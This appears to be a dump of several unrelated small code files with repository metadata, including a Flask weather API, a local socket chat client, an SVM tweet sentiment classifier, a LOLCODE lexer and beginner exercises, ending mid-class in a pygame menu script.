results = session.query(Measurement.date, Measurement.tobs).\
filter(Measurement.date >= "2016-08-24", Measurement.date <= "2017-08-23").\
all()
# creates JSONified list
precipitation_list = [results]
return jsonify(precipitation_list)
@app.route("/api/v1.0/stations")
def stations():
"""Return a list of stations"""
results = session.query(Station.name, Station.station, Station.elevation).all()
# creates JSONified list of dictionaries
station_list = []
for result in results:
row = {}
row['name'] = result[0]
row['station'] = result[1]
row['elevation'] = result[2]
station_list.append(row)
return jsonify(station_list)
@app.route("/api/v1.0/tobs")
def temp_obs():
"""Return a list of tobs for the previous year"""
results = session.query(Station.name, Measurement.date, Measurement.tobs).\
filter(Measurement.date >= "2016-08-24", Measurement.date <= "2017-08-23").\
all()
# creates JSONified list of dictionaries
tobs_list = []
for result in results:
row = {}
row["Station"] = result[0]
row["Date"] = result[1]
row["Temperature"] = int(result[2])
tobs_list.append(row)
return jsonify(tobs_list)
@app.route('/api/v1.0/<date>/')
def given_date(date):
"""Return the average temp, max temp, and min temp for the date"""
results = session.query(func.avg(Measurement.tobs), func.max(Measurement.tobs), func.min(Measurement.tobs)).\
filter(Measurement.date >= date).all()
# creates JSONified list of dictionaries
data_list = []
for result in results:
row = {}
row['Start Date'] = date
row['End Date'] = '2017-08-23'
row['Average Temperature'] = float(result[0])
row['Highest Temperature'] = float(result[1])
row['Lowest Temperature'] = float(result[2])
data_list.append(row)
return jsonify(data_list)
@app.route('/api/v1.0/<start_date>/<end_date>/')
def query_dates(start_date, end_date):
"""Return the avg, max, min, temp over a specific time period"""
results = session.query(func.avg(Measurement.tobs), func.max(Measurement.tobs), func.min(Measurement.tobs)).\
filter(Measurement.date >= start_date, Measurement.date <= end_date).all()
# creates JSONified list of dictionaries
data_list = []
for result in results:
row = {}
row["Start Date"] = start_date
row["End Date"] = end_date
row["Average Temperature"] = float(result[0])
row["Highest Temperature"] = float(result[1])
row["Lowest Temperature"] = float(result[2])
data_list.append(row)
return jsonify(data_list)
if __name__ == '__main__':
app.run(debug=True)
|
[
"natehigs@me.com"
] |
natehigs@me.com
|
d7001dd38592a49dbda5f7ff0c6563451fa76648
|
b4bf2538e4c6c1a4ae0e13ef29bc886109f155ef
|
/Networking/rep.py
|
b912c58c064396321e5ba453f9be5559feffdf8c
|
[] |
no_license
|
Mobytoss/Harpy
|
4a2837521657b3e745f724df7f7ead836e52d51e
|
b42a93a35c84c879d79a58c01bd18090f225cc28
|
refs/heads/master
| 2020-05-16T21:48:42.347083
| 2013-10-15T13:42:12
| 2013-10-15T13:42:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
py
|
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create a socket object
host = socket.gethostname()
port = 1234
s.connect((host, port))
message = ""  # renamed to avoid shadowing the built-in input()
while message != "/exit":
    message = raw_input("> ")
    s.send(message)
s.close()
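# A minimal companion server sketch (assumption: the original repo ships only
# the client above, so the host/port convention here simply mirrors it; like
# the client, this is written for Python 2).
def run_echo_server(port=1234):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((socket.gethostname(), port))
    server.listen(1)
    conn, addr = server.accept()
    while True:
        data = conn.recv(1024)
        if not data or data == "/exit":
            break
        print("received: " + data)
    conn.close()
    server.close()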
|
[
"toby.moss@me.com"
] |
toby.moss@me.com
|
e3925282d93077c51e6c35e61ba91226ed6be45b
|
6a95bda883586fb739c657bb3c320d4bd3c0aff4
|
/svm.py
|
58295d0bddcbe171fce83eaf6ecf5c27c3d5d91f
|
[] |
no_license
|
harpreetheer/group-I
|
515d62ab59ad09b9178f56cc482b939b6d363803
|
b660707fc66cb39319c0d04aca0bae0ed242cf84
|
refs/heads/master
| 2020-06-10T19:09:40.881974
| 2019-08-02T15:54:33
| 2019-08-02T15:54:33
| 193,716,543
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,491
|
py
|
from sklearn import svm
#import utils
import random
import numpy as np
from scipy.sparse import lil_matrix
from sklearn.feature_extraction.text import TfidfTransformer
import sys
import pickle
import random
def file_to_wordset(filename):
''' Converts a file with a word per line to a Python set '''
words = []
with open(filename, 'r') as f:
for line in f:
words.append(line.strip())
return set(words)
def write_status(i, total):
''' Writes status of a process to console '''
sys.stdout.write('\r')
sys.stdout.write('Processing %d/%d' % (i, total))
sys.stdout.flush()
def save_results_to_csv(results, csv_file):
''' Save list of type [(tweet_id, positive)] to csv in Kaggle format '''
with open(csv_file, 'w') as csv:
csv.write('id,prediction\n')
for tweet_id, pred in results:
csv.write(tweet_id)
csv.write(',')
csv.write(str(pred))
csv.write('\n')
def top_n_words(pkl_file_name, N, shift=0):
"""
Returns a dictionary of form {word:rank} of top N words from a pickle
file which has a nltk FreqDist object generated by stats.py
Args:
pkl_file_name (str): Name of pickle file
N (int): The number of words to get
shift: amount to shift the rank from 0.
Returns:
dict: Of form {word:rank}
"""
with open(pkl_file_name, 'rb') as pkl_file:
freq_dist = pickle.load(pkl_file)
most_common = freq_dist.most_common(N)
words = {p[0]: i + shift for i, p in enumerate(most_common)}
return words
def top_n_bigrams(pkl_file_name, N, shift=0):
"""
Returns a dictionary of form {bigram:rank} of top N bigrams from a pickle
file which has a Counter object generated by stats.py
Args:
pkl_file_name (str): Name of pickle file
N (int): The number of bigrams to get
shift: amount to shift the rank from 0.
Returns:
dict: Of form {bigram:rank}
"""
with open(pkl_file_name, 'rb') as pkl_file:
freq_dist = pickle.load(pkl_file)
most_common = freq_dist.most_common(N)
bigrams = {p[0]: i for i, p in enumerate(most_common)}
return bigrams
def split_data(tweets, validation_split=0.1):
"""Split the data into training and validation sets
Args:
tweets (list): list of tuples
validation_split (float, optional): validation split %
Returns:
(list, list): training-set, validation-set
"""
index = int((1 - validation_split) * len(tweets))
random.shuffle(tweets)
return tweets[:index], tweets[index:]
# Performs classification using SVM.
FREQ_DIST_FILE = '../train-processed-freqdist.pkl'
BI_FREQ_DIST_FILE = '../train-processed-freqdist-bi.pkl'
TRAIN_PROCESSED_FILE = '../train-processed.csv'
TEST_PROCESSED_FILE = '../test-processed.csv'
TRAIN = True
UNIGRAM_SIZE = 15000
VOCAB_SIZE = UNIGRAM_SIZE
USE_BIGRAMS = True
if USE_BIGRAMS:
BIGRAM_SIZE = 10000
VOCAB_SIZE = UNIGRAM_SIZE + BIGRAM_SIZE
FEAT_TYPE = 'frequency'
def get_feature_vector(tweet):
uni_feature_vector = []
bi_feature_vector = []
words = tweet.split()
for i in range(len(words) - 1):
word = words[i]
next_word = words[i + 1]
if unigrams.get(word):
uni_feature_vector.append(word)
if USE_BIGRAMS:
if bigrams.get((word, next_word)):
bi_feature_vector.append((word, next_word))
if len(words) >= 1:
if unigrams.get(words[-1]):
uni_feature_vector.append(words[-1])
return uni_feature_vector, bi_feature_vector
def extract_features(tweets, batch_size=500, test_file=True, feat_type='presence'):
num_batches = int(np.ceil(len(tweets) / float(batch_size)))
for i in range(num_batches):
batch = tweets[i * batch_size: (i + 1) * batch_size]
features = lil_matrix((batch_size, VOCAB_SIZE))
labels = np.zeros(batch_size)
for j, tweet in enumerate(batch):
if test_file:
tweet_words = tweet[1][0]
tweet_bigrams = tweet[1][1]
else:
tweet_words = tweet[2][0]
tweet_bigrams = tweet[2][1]
labels[j] = tweet[1]
if feat_type == 'presence':
tweet_words = set(tweet_words)
tweet_bigrams = set(tweet_bigrams)
for word in tweet_words:
idx = unigrams.get(word)
if idx:
features[j, idx] += 1
if USE_BIGRAMS:
for bigram in tweet_bigrams:
idx = bigrams.get(bigram)
if idx:
features[j, UNIGRAM_SIZE + idx] += 1
yield features, labels
def apply_tf_idf(X):
transformer = TfidfTransformer(smooth_idf=True, sublinear_tf=True, use_idf=True)
transformer.fit(X)
return transformer
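# A tiny self-contained sketch of what apply_tf_idf does to a raw count matrix
# (toy numbers only; this helper is not part of the original training pipeline):
def _tfidf_toy_example():
    counts = lil_matrix((2, 3))
    counts[0, 0] = 2   # word 0 appears twice in tweet 0
    counts[1, 1] = 1   # word 1 appears once in tweet 1
    transformer = apply_tf_idf(counts)
    # Rows are re-weighted so frequent-but-uninformative terms count less
    # before the LinearSVC sees them.
    return transformer.transform(counts).toarray()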
def process_tweets(csv_file, test_file=True):
"""Returns a list of tuples of type (tweet_id, feature_vector)
or (tweet_id, sentiment, feature_vector)
Args:
csv_file (str): Name of processed csv file generated by preprocess.py
test_file (bool, optional): If processing test file
Returns:
list: Of tuples
"""
tweets = []
print ('Generating feature vectors')
with open(csv_file, 'r') as csv:
lines = csv.readlines()
total = len(lines)
for i, line in enumerate(lines):
if test_file:
tweet_id, tweet = line.split(',')
else:
tweet_id, sentiment, tweet = line.split(',')
feature_vector = get_feature_vector(tweet)
if test_file:
tweets.append((tweet_id, feature_vector))
else:
tweets.append((tweet_id, int(sentiment), feature_vector))
write_status(i + 1, total)
print ('\n')
return tweets
if __name__ == '__main__':
np.random.seed(1337)
unigrams = top_n_words(FREQ_DIST_FILE, UNIGRAM_SIZE)
if USE_BIGRAMS:
bigrams = top_n_bigrams(BI_FREQ_DIST_FILE, BIGRAM_SIZE)
tweets = process_tweets(TRAIN_PROCESSED_FILE, test_file=False)
if TRAIN:
train_tweets, val_tweets = split_data(tweets)
else:
random.shuffle(tweets)
train_tweets = tweets
del tweets
print ('Extracting features & training batches')
clf = svm.LinearSVC(C=0.1)
batch_size = len(train_tweets)
i = 1
n_train_batches = int(np.ceil(len(train_tweets) / float(batch_size)))
for training_set_X, training_set_y in extract_features(train_tweets, test_file=False, feat_type=FEAT_TYPE, batch_size=batch_size):
write_status(i, n_train_batches)
i += 1
if FEAT_TYPE == 'frequency':
tfidf = apply_tf_idf(training_set_X)
training_set_X = tfidf.transform(training_set_X)
clf.fit(training_set_X, training_set_y)
print ('\n')
print ('Testing')
if TRAIN:
correct, total = 0, len(val_tweets)
i = 1
batch_size = len(val_tweets)
n_val_batches = int(np.ceil(len(val_tweets) / float(batch_size)))
for val_set_X, val_set_y in extract_features(val_tweets, test_file=False, feat_type=FEAT_TYPE, batch_size=batch_size):
if FEAT_TYPE == 'frequency':
val_set_X = tfidf.transform(val_set_X)
prediction = clf.predict(val_set_X)
correct += np.sum(prediction == val_set_y)
write_status(i, n_val_batches)
i += 1
print ('\nCorrect: %d/%d = %.4f %%' % (correct, total, correct * 100. / total))
else:
del train_tweets
test_tweets = process_tweets(TEST_PROCESSED_FILE, test_file=True)
n_test_batches = int(np.ceil(len(test_tweets) / float(batch_size)))
predictions = np.array([])
print ('Predicting batches')
i = 1
for test_set_X, _ in extract_features(test_tweets, test_file=True, feat_type=FEAT_TYPE):
if FEAT_TYPE == 'frequency':
test_set_X = tfidf.transform(test_set_X)
prediction = clf.predict(test_set_X)
predictions = np.concatenate((predictions, prediction))
write_status(i, n_test_batches)
i += 1
predictions = [(str(j), int(predictions[j]))
for j in range(len(test_tweets))]
save_results_to_csv(predictions, 'svm.csv')
print ('\nSaved to svm.csv')
|
[
"noreply@github.com"
] |
harpreetheer.noreply@github.com
|
80f09c5b9d22476348d3c1492fe361283951adc8
|
b66035d6216f5e33fdeca2edb74daabe6d8a9ca0
|
/One-Hot Encoding.py
|
ff53c359543e01a0963246d0ba33f0d310a09379
|
[] |
no_license
|
mengqqq/pandas-playground
|
96a5dec71321b0f21aca6327864c8da6efa86e07
|
81bff69d5eaa83c5efdb2388d9f0c83aa9a43226
|
refs/heads/master
| 2021-01-12T06:25:22.387308
| 2019-02-01T05:46:52
| 2019-02-01T05:46:52
| 77,357,472
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,351
|
py
|
#In this exercise we'll load the titanic data(from Project 0)
#And then perform one-hot encoding on the feature names
import numpy as np
import pandas as pd
#load the dataset
X=pd.read_csv('titanic_data.csv')
#Limit to categorical data
X=X.select_dtypes(include=[object])
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
#TODO:Create a LabelEncoder object,which will turn all labels present in each featuren to numbers.For example,the labels
#['cat','dog','fish'] might be transformed into[0,1,2]
le=LabelEncoder()
#TODO:For each feature in X,apply the LabelEncoder's fit_transform function,which will first learn the labels for the feature(fit)
#and then change the labels to numbers(transform)
for feature in X:
X[feature]=le.fit_transform(X[feature])
#TODO:Create a OneHotEncoder object,which will create a feature for each label present in the data.For example,for a feature
#'animal' that had the labels ['cat','dog','fish'],the new features (instead of 'animal') could be ['animal_cat','animal_dog',
#'animal_fish']
ohe=OneHotEncoder()
#TODO:Apply the OneHotEncoder's fit_transform function to all of X,which will first learn of all the (now numerical) labels in the
#data(fit),and then change the data to one-hot encoded entries(transfomr)
onehotlabels = ohe.fit_transform(X)
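# A minimal sketch of the same two-step encoding on a toy column ('animal' is a
# made-up feature used only for illustration; it is not in the Titanic data):
toy = pd.DataFrame({'animal': ['cat', 'dog', 'fish', 'cat']})
toy_labels = LabelEncoder().fit_transform(toy['animal'])              # e.g. [0, 1, 2, 0]
toy_onehot = OneHotEncoder().fit_transform(toy_labels.reshape(-1, 1))
print(toy_onehot.toarray())   # one indicator column per label: cat, dog, fish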
|
[
"noreply@github.com"
] |
mengqqq.noreply@github.com
|
bdac5edf7f3db0fe435d7b0ab6901a9fc6b4d318
|
23d4c1deda861ab6b4c1993df7777c34701ad53b
|
/OperacionesEsenciales.py
|
6ed9ce908a6ecbdeedd55d72d8d335ab36b22d6e
|
[] |
no_license
|
JaviMiot/EstructuraDatosLinealesPy
|
2256fc3cb3a1a66e4f227d43665843b591bbb06e
|
7186ef7fa9dbe05aefc1366e3e389733565f38fc
|
refs/heads/master
| 2023-07-21T00:48:44.571028
| 2021-08-16T13:44:35
| 2021-08-16T13:44:35
| 396,812,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
fruits = []
fruits.append('kiwi')
fruits.append('Melon')
fruits.append('Berry')
fruits.sort()
def pyramid_sum(lower, upper, margin=0):
blanks = ' '*margin
print(blanks, lower, upper)
if lower > upper:
print(blanks, 0)
return 0
else:
result = lower + pyramid_sum(lower+1, upper, margin+4)
print(blanks, result)
return result
pyramid_sum(1, 4)
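# Sanity check (the indented lines printed above are only a trace of the
# recursion; the return value is simply lower + (lower+1) + ... + upper):
assert pyramid_sum(1, 4) == sum(range(1, 5)) == 10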
|
[
"51manobandajavier@gmail.com"
] |
51manobandajavier@gmail.com
|
f74fc4a2ebfb0443c20ad7abd7a4ab66bf9333b6
|
f344893ad54833825e96f5b944658ff7549fa22b
|
/demo/urls.py
|
5d0e462c636b3da392f7ed28375faec4ec52560e
|
[] |
no_license
|
snow/stargazer
|
f9a95f633d94b63e52baca4e2364dfbfce8a6067
|
574228cc79377c3ecf31eb1e15b5366a72484538
|
refs/heads/master
| 2021-01-19T06:35:36.772041
| 2011-12-24T08:31:54
| 2011-12-24T08:31:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 976
|
py
|
from django.conf.urls.defaults import patterns, include, url
from django.contrib.auth.decorators import login_required
from demo.views import *
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', IndexView.as_view()),
url(r'^post/create/$', login_required(CreatePostView.as_view())),
url(r'^post/(?P<type>recent|top|trending)/$',
PostListContainerView.as_view()),
url(r'^post/load/recent/', RecentPostListView.as_view()),
url(r'^post/load/by_user/(?P<id>\d+)/', UserPostListView.as_view()),
url(r'^post/like/$', login_required(LikePostView.as_view())),
url(r'^post/ban/$', login_required(BanPostView.as_view())),
url(r'^user/(?P<pk>\d+)/$', UserProfileView.as_view()),
url(r'^me/$', login_required(MeView.as_view())),
url(r'^teleport/$', TeleportView.as_view()),
url(r'^accounts/signup/$', SignupView.as_view()),
)
|
[
"snow.hellsing@gmail.com"
] |
snow.hellsing@gmail.com
|
fac2d298e02bcc8ef50d8d0b6951a4819ac85271
|
bf99b1b14e9ca1ad40645a7423f23ef32f4a62e6
|
/AtCoder/other/第5回_ドワンゴからの挑戦状/c.py
|
fb79bc6efefb9431f198b277bfb46c18636d9ead
|
[] |
no_license
|
y-oksaku/Competitive-Programming
|
3f9c1953956d1d1dfbf46d5a87b56550ff3ab3db
|
a3ff52f538329bed034d3008e051f30442aaadae
|
refs/heads/master
| 2021-06-11T16:14:12.635947
| 2021-05-04T08:18:35
| 2021-05-04T08:18:35
| 188,639,647
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
N = int(input())
S = input()
_ = input()
K = list(map(int, input().split()))
def sol(k):
ret = 0
right = 0
c = 0
m = 0
mc = 0
nx = 0
for left, s in enumerate(S):
while right < N and right - left < k:
if S[right] == 'M':
nx += 1
elif S[right] == 'C':
m += nx
mc += m
nx = 0
c += 1
right += 1
if s == 'D':
ret += mc
elif s == 'M':
mc -= c
m -= 1
elif s == 'C':
c -= 1
return ret
for k in K:
print(sol(k))
|
[
"y.oksaku@stu.kanazawa-u.ac.jp"
] |
y.oksaku@stu.kanazawa-u.ac.jp
|
2040c5809e80b3fab02ac186ac01165dc0f87e90
|
01d6b909e91b6472ec03833196723988602845ad
|
/Project7/lolcode_lexer.py
|
a974cecf0864628046bed0ee39d14e73644c3d4a
|
[] |
no_license
|
Slapppy109/CSE450
|
c93c881c990d993485f2a3675f21170402d89bd0
|
d3b13d37aada8bdcd748d3a0998df2821638cc4f
|
refs/heads/main
| 2023-02-05T05:14:33.999649
| 2020-12-25T19:17:09
| 2020-12-25T19:17:09
| 324,418,100
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,534
|
py
|
import re
from . rply import LexerGenerator
from . ast_nodes import PrimitiveType
def get_tokens_and_types(input_):
lg = LexerGenerator()
keywords = set()
id_to_type = {}
# Comments
lg.ignore(r'OBTW.*?TLDR', flags=re.DOTALL)
lg.ignore(r'BTW.*')
# Whitespace
lg.add('NEWLINE', r'\r|\n|(\n\r)|,')
lg.ignore(r'[ \t]+')
# Literals
lg.add('NUMBAR_LITERAL', r'-?[0-9]*\.[0-9]+')
lg.add('NUMBR_LITERAL', r'-?[0-9]+')
lg.add('LETTR_LITERAL', r"'([^:']|(:')|(:>)|(::)|(:\)))'")
id_to_type['WIN'] = 'TROOF_LITERAL'
id_to_type['FAIL'] = 'TROOF_LITERAL'
lg.add('YARN_LITERAL', r'"([^:"]|(:")|(:>)|(::)|(:\)))*"')
# Program Keywords
keywords |= {'HAI', 'KTHXBYE'}
# Array Types
for primitive_type in PrimitiveType:
id_to_type[primitive_type.name + 'S'] = 'ARRAY_TYPE'
# Primitive Types
for primitive_type in PrimitiveType:
id_to_type[primitive_type.name] = 'PRIMITIVE_TYPE'
# IO Keywords
keywords |= {'VISIBLE', 'GIMMEH', 'WHATEVR'}
lg.add('BANG', r'!')
# Declaration and Initialization Keywords
keywords |= {'I', 'HAS', 'A', 'ITZ', 'AN'}
# ASSIGNMENT
keywords |= {'R'}
# MATH OPERATORS
id_to_type['SUM'] = 'MATH_BINARY_OPERATOR'
id_to_type['DIFF'] = 'MATH_BINARY_OPERATOR'
id_to_type['PRODUKT'] = 'MATH_BINARY_OPERATOR'
id_to_type['QUOSHUNT'] = 'MATH_BINARY_OPERATOR'
id_to_type['BIGGR'] = 'MATH_BINARY_OPERATOR'
id_to_type['SMALLR'] = 'MATH_BINARY_OPERATOR'
id_to_type['FLIP'] = 'MATH_UNARY_OPERATOR'
id_to_type['SQUAR'] = 'MATH_UNARY_OPERATOR'
keywords |= {'OF'}
# LOGICAL OPERATORS
id_to_type['BOTH'] = 'LOGICAL_BINARY_OPERATOR'
id_to_type['EITHER'] = 'LOGICAL_BINARY_OPERATOR'
id_to_type['WON'] = 'LOGICAL_BINARY_OPERATOR'
id_to_type['NOT'] = 'LOGICAL_UNARY_OPERATOR'
id_to_type['ALL'] = 'LOGICAL_VARIABLE_OPERATOR'
id_to_type['ANY'] = 'LOGICAL_VARIABLE_OPERATOR'
keywords |= {'MKAY'}
# COMPARISON OPERATORS
id_to_type['SAEM'] = 'COMPARISON_BINARY_OPERATOR'
id_to_type['DIFFRINT'] = 'COMPARISON_BINARY_OPERATOR'
id_to_type['FURSTSMALLR'] = 'COMPARISON_BINARY_OPERATOR'
id_to_type['FURSTBIGGR'] = 'COMPARISON_BINARY_OPERATOR'
# ASSIGNMENT OPERATORS
id_to_type['UPPIN'] = 'ASSIGNMENT_OPERATOR'
id_to_type['NERFIN'] = 'ASSIGNMENT_OPERATOR'
keywords |= {'BY'}
# CONDITIONAL STATEMENT
keywords |= {'O', 'RLY', 'YA', 'NO', 'WAI', 'OIC'}
lg.add('QUESTION_MARK', r'\?')
# LOOPS
keywords |= {'IM', 'IN', 'YR', 'LOOP', 'OUTTA', 'NOW', 'GTFO'}
# LOOPS For Project 5
keywords |= {'TIL'}
# ARRAYS
keywords |= {'YARN', 'LOTZ', 'THAR', 'IZ', 'PUT', 'IN', 'LENGTHZ'}
lg.add('INDEX_OPERATOR', r"'Z")
# FUNCTIONS
keywords |= {'HOW', 'IF', 'U', 'SAY', 'SO', 'FOUND'}
# Other words are variable names
lg.add('IDENTIFIER', r'[a-zA-Z][a-zA-Z_0-9]*')
lg.add('ERROR', r'.')
# CASE
keywords |= {'WTF', 'OMG', 'OMGWTF', 'OIC'}
lexer = lg.build()
tokens = list(lexer.lex(input_))
for token in tokens:
lexeme = token.value
if lexeme in keywords:
token.name = token.value
elif lexeme in id_to_type:
token.name = id_to_type[lexeme]
rules_to_ignore = {'ERROR'}
token_types = [rule.name for rule in lexer.rules if rule.name not in rules_to_ignore]
token_types.extend(keywords)
token_types.extend(set(id_to_type.values()))
return tokens, token_types
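# Minimal usage sketch (the LOLCODE snippet below is made up for illustration;
# real input comes from the course's test programs). Defined but not called so
# importing this module stays side-effect free.
def _example_lex():
    sample = 'HAI 1.2\nVISIBLE "HELLO"\nKTHXBYE\n'
    tokens, token_types = get_tokens_and_types(sample)
    for token in tokens:
        print(token.name, repr(token.value))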
|
[
"noreply@github.com"
] |
Slapppy109.noreply@github.com
|
6a37cbe91e17feb62b020198a8684987f1b61f1b
|
0062ceae0071aaa3e4e8ecd9025e8cc9443bcb3b
|
/solved/2460.py
|
e43dcbf5be4ab48cd6e0851f802d45d406b792b7
|
[] |
no_license
|
developyoun/AlgorithmSolve
|
8c7479082528f67be9de33f0a337ac6cc3bfc093
|
5926924c7c44ffab2eb8fd43290dc6aa029f818d
|
refs/heads/master
| 2023-03-28T12:02:37.260233
| 2021-03-24T05:05:48
| 2021-03-24T05:05:48
| 323,359,039
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 122
|
py
|
res, ans = 0, 0
for _ in range(10):
a, b = map(int, input().split())
res += b-a
ans = max(res, ans)
print(ans)
|
[
"pyoun820@naver.com"
] |
pyoun820@naver.com
|
851484b4d81515383127776083647ed6be8ec8ff
|
9aa3bd9ee15623a3922159d00bc4918c0a586c1a
|
/week5/game/run.py
|
422a91aea0e5e6876d51838ee88999b25635958e
|
[] |
no_license
|
q1144/spp-code-samples
|
b950443e53c36588ab65acc24eb36eb2ffa8fbf1
|
8d16ebf41e277f9f189c32c877a9c4186dcfa341
|
refs/heads/master
| 2021-08-19T10:46:28.717692
| 2017-11-26T00:00:40
| 2017-11-26T00:00:40
| 109,323,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 582
|
py
|
from g_classes import *
from util_classes import SupTools
# --- define entry point function
def run_game():
print('-------------------------------Welcome to the game!---------------------------\n')
# set amount of troops
total_army_qnt = SupTools.set_army_qnt()
user_army = Army(Recruiter().recruite_for_user(total_army_qnt), 'User')
opp_army = Army(Recruiter().recruite_for_NPC(total_army_qnt), 'NPC')
Fight = Battle(user_army, opp_army)
Fight.begin()
# -------------------- Run main function ------------------
run_game()
|
[
"kachur.oleg@gmail.com"
] |
kachur.oleg@gmail.com
|
e2d0468b0ddd2654f659ef22a7b2ab17c7fafc3b
|
7f6348437a68aef1035824e3c2ac7476e81cf5f0
|
/Hashing/colorful-number.py
|
77a200c426fb273da6bdf6346026e6235a772ca8
|
[] |
no_license
|
wilfredarin/Interviewbit
|
eff18ce504a2178dbed0441f9b43df51f0a34dd1
|
a13de501db6e0af9d58936ffa9abdd9eebc7578d
|
refs/heads/master
| 2023-01-27T15:36:11.726563
| 2020-12-10T15:09:14
| 2020-12-10T15:09:14
| 233,567,842
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 598
|
py
|
class Solution:
# @param A : integer
# @return an integer
def colorful(self, A):
s = str(A)
n = len(s)
s = list(s)
p = {}
i = 1
while i<=n:
j=0
while j+i<=n:
o = s[j:j+i]
u =1
for q in o:
u*=int(q)
if u in p.keys():
return 0
else:
p[u]=1
j+=1
i+=1
return 1
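# Example usage (illustration only, not part of the original submission):
# 3245 is colorful because every consecutive digit group has a distinct product
# (3, 2, 4, 5, 6, 8, 20, 24, 40, 120); in 326 the digit 6 collides with 3*2.
if __name__ == '__main__':
    print(Solution().colorful(3245))  # expected: 1
    print(Solution().colorful(326))   # expected: 0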
|
[
"noreply@github.com"
] |
wilfredarin.noreply@github.com
|
52d3b39e32c041bd114d23cd7daf9be2ebc5e514
|
87ad88c4150b1770e2de793557db394c5ae087cb
|
/for_num_game.py
|
ed6d6c80ab84cd34080f04b1a2db396e0eca9a90
|
[] |
no_license
|
pratiksan45/Python3.7
|
bfedad3723cee82bdd3512f1c11456a6a5f1a925
|
aa8943e81e68a3cf699423286856c37cf194f120
|
refs/heads/master
| 2022-09-09T14:15:12.723017
| 2020-05-25T15:37:55
| 2020-05-25T15:37:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
import random
win_num=random.randint(1,100)
for i in range(1,100):
guess=int(input("Specify your number \n "))
print("Analyzing your number..... ")
if guess<win_num:
print("Too Low ! ")
elif guess>win_num:
print("Too High ! ")
else:
print("CONGRATULATIONS ! Youre Number is correct")
print(f"You guessed the winning number in {i} intervals")
break
#names=input("Enter the Specified name\n")
#name=names.lower()
#var=""
#i=0
#while i<len(name):
#if name[i] not in var:
#var+=name[i]
#print(str(name[i]) +":"+ str(name.count(name[i]) ))
#i+=1
|
[
"noreply@github.com"
] |
pratiksan45.noreply@github.com
|
5ab5a8fe6272a579cf1e84de9beb0052b0a43dc7
|
799cfbd2c6426ffa7ab5f188bd647d572051914c
|
/rotateArray.py
|
34740139c6098cff232ae9e81e54d877becf66dd
|
[] |
no_license
|
van950105/leetcode
|
af8d2ded307afbfbf67df604a69406f9ab5ef1b0
|
7b6cbab37e13ff1d764b852bc1794ecbfd4feefe
|
refs/heads/master
| 2016-09-03T06:22:43.451203
| 2015-11-12T18:49:38
| 2015-11-12T18:49:38
| 25,235,439
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 500
|
py
|
class Solution(object):
def rotate(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: void Do not return anything, modify nums in-place instead.
"""
length=len(nums)
self.reverse(nums,0,length-k)
self.reverse(nums,length-k,length)
self.reverse(nums,0,length)
def reverse(self,num,s,e):
num[s:e]=num[s:e][::-1]
#Rotate first part,second part and the whole list
a = Solution()
print(a.rotate([1], 1))  # prints None: rotate() modifies the list in place
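# Worked example (illustration only, not part of the original file): reversing
# the first n-k elements, then the last k, then the whole list turns
# [1, 2, 3, 4, 5, 6, 7] with k=3 into [5, 6, 7, 1, 2, 3, 4].
nums = [1, 2, 3, 4, 5, 6, 7]
Solution().rotate(nums, 3)
print(nums)  # [5, 6, 7, 1, 2, 3, 4]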
|
[
"ryan.gm.nb@gmail.com"
] |
ryan.gm.nb@gmail.com
|
6300bdfd2672ce3ad803ad57825f41def48e8f2c
|
6c26a9bd075d3d54a307d7c1e5a0bc67b50df8c2
|
/python_intermediate/python5/02_intro.py
|
2d9b7d1a158e4176847e1b7ea1b41917c95d97fa
|
[] |
no_license
|
marialobillo/dataquest
|
86efc49c0339c07e6263d428b5ecd2f80d395ecb
|
49e8b653adf23a12fb9eb6a972d85bc1797dba0a
|
refs/heads/master
| 2021-08-28T08:01:36.301087
| 2017-12-11T16:02:18
| 2017-12-11T16:02:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 284
|
py
|
import csv
f = open('nfl_suspensions_data.csv', 'r')
nfl_suspensions = list(csv.reader(f))[1:]  # skip the header row
years = {}
for row in nfl_suspensions:
row_year = row[5]
if row_year in years:
years[row_year] += 1
else:
years[row_year] = 1
print(years)
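# The same tally can be produced with the standard library's Counter
# (equivalent result, shown here only for comparison):
from collections import Counter
print(dict(Counter(row[5] for row in nfl_suspensions)))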
|
[
"maria.lobillo.santos@gmail.com"
] |
maria.lobillo.santos@gmail.com
|
5d9af04328cd22f5d1be08484844dc384096efb8
|
46a1cfb9b737ea686d14ef3f903ffc66ad014a74
|
/Menu.py
|
e87f515e4202b8f3fa5a8c8ed7741b9ae10ec1c1
|
[] |
no_license
|
kronmess/FinalProjectSem1
|
f66b88821acb1941e5d0462a078b6975c99c0463
|
74afee13d373a4d2058d5cf0e4482274831630ef
|
refs/heads/master
| 2020-12-09T18:33:22.426614
| 2020-01-17T13:57:35
| 2020-01-17T13:57:35
| 233,384,878
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,607
|
py
|
import pygame
from Target import red
from Target import white
from Target import win
#function used to draw in text
def draw_text(message,color,x,y,font_size):
Font = pygame.font.Font('press_start.ttf',font_size)
text = Font.render(message, True, color)
win.blit(text,[x,y])
#function used to draw rectangle
def make_rect(surface,color,rectangle,thickness= 0):
pygame.draw.rect(surface,color,rectangle,thickness)
#class used to define item property
class Menu:
def __init__(self,stock,price,name,description,base,buybase,title_x,title_y,description_x,description_y,stock_x,stock_y,price_x,price_y):
self.stock = stock
self.price = price
